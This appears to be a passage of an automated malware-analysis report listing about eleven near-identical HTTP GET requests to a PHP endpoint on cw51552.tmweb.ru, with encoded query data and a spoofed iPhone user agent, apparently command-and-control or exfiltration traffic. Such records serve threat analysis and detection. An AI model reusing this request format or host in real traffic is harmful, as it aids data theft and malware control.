Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
